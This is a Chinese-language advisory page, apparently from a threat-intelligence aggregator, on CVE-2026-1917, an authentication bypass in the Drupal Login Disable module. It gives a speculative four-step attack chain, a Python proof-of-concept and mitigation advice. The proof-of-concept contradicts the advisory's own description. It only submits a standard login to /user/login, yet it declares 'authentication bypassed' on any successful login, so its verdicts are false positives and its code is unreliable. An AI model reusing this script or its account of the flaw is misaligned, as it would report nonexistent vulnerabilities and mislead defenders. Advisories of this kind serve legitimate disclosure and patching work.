CVE-2026-1917 CVSS 4.3 中危

CVE-2026-1917 Drupal Login Disable认证绕过漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1917

漏洞类型

认证绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Drupal Login Disable

漏洞概述

Drupal Login Disable模块存在认证绕过漏洞。该漏洞源于使用了备用路径或信道，允许攻击者在特定条件下绕过登录限制，实现功能绕过。此问题影响从0.0.0版本开始至2.1.3之前的所有版本，可能导致低权限用户获取不应具备的访问权限，对系统机密性构成一定风险。

技术细节

该漏洞的核心在于Drupal Login Disable模块未能全面覆盖所有认证入口。模块设计初衷是阻止特定用户或所有用户的登录行为，但其实现逻辑可能仅针对标准的登录表单或特定路由进行了拦截。攻击者可以利用Drupal系统中未被模块覆盖的备用认证信道（如直接调用内部API、利用特定的回调端点或修改请求头绕过前端检查）发送认证请求。由于CVSS向量显示需要低权限（PR:L），攻击者可能利用现有的低权限账户，通过备用路径提升权限或访问被禁用的功能区域，从而破坏系统的访问控制策略。

攻击链分析

STEP 1

侦察

攻击者识别目标站点使用了Drupal CMS，并检测到Login Disable模块已安装且版本低于2.1.3。

STEP 2

探测

攻击者分析站点的登录机制，寻找未被Login Disable模块拦截的备用路径或API接口。

STEP 3

利用

攻击者向发现的备用端点发送构造好的认证请求（包含低权限凭据），尝试绕过登录限制。

STEP 4

绕过

由于模块未拦截该路径，系统验证通过，攻击者成功登录并获取了本应被限制的功能访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url, username, password):
    """
    PoC for CVE-2026-1917: Authentication Bypass in Drupal Login Disable.
    Attempts to login via a direct POST request which might bypass the module's restrictions.
    """
    login_url = f"{target_url}/user/login"
    
    # Standard login payload
    payload = {
        "name": username,
        "pass": password,
        "form_id": "user_login_form",
        "op": "Log in"
    }
    
    session = requests.Session()
    
    try:
        # Get the login page to establish session and potentially get CSRF token if needed
        response = session.get(login_url)
        
        # Attempt to post login credentials
        response = session.post(login_url, data=payload)
        
        # Check if login was successful by looking for 'Log out' link or checking redirection
        if response.status_code == 200 and 'Log out' in response.text:
            print(f"[+] Vulnerability confirmed! Authentication bypassed on {target_url}")
            return True
        else:
            print(f"[-] Authentication bypass failed or patch applied.")
            return False
            
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

if __name__ == "__main__":
    target = "http://example.com"  # Replace with target URL
    user = "testuser"
    pwd = "password"
    check_vulnerability(target, user, pwd)

影响范围

Drupal Login Disable < 2.1.3

防御指南

临时缓解措施

建议管理员立即排查Drupal站点的模块版本，如果使用了Login Disable模块且版本受影响，应立即进行升级。若暂时无法升级，建议通过服务器配置（如.htaccess或Nginx规则）限制对/user/login等路径的访问，或暂时禁用该模块以修复安全缺口。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1917
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1917
3 Details https://www.cvedetails.com/cve/CVE-2026-1917/
4 VulDB https://vuldb.com/cve/CVE-2026-1917
5 Link https://www.drupal.org/sa-contrib-2026-008

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表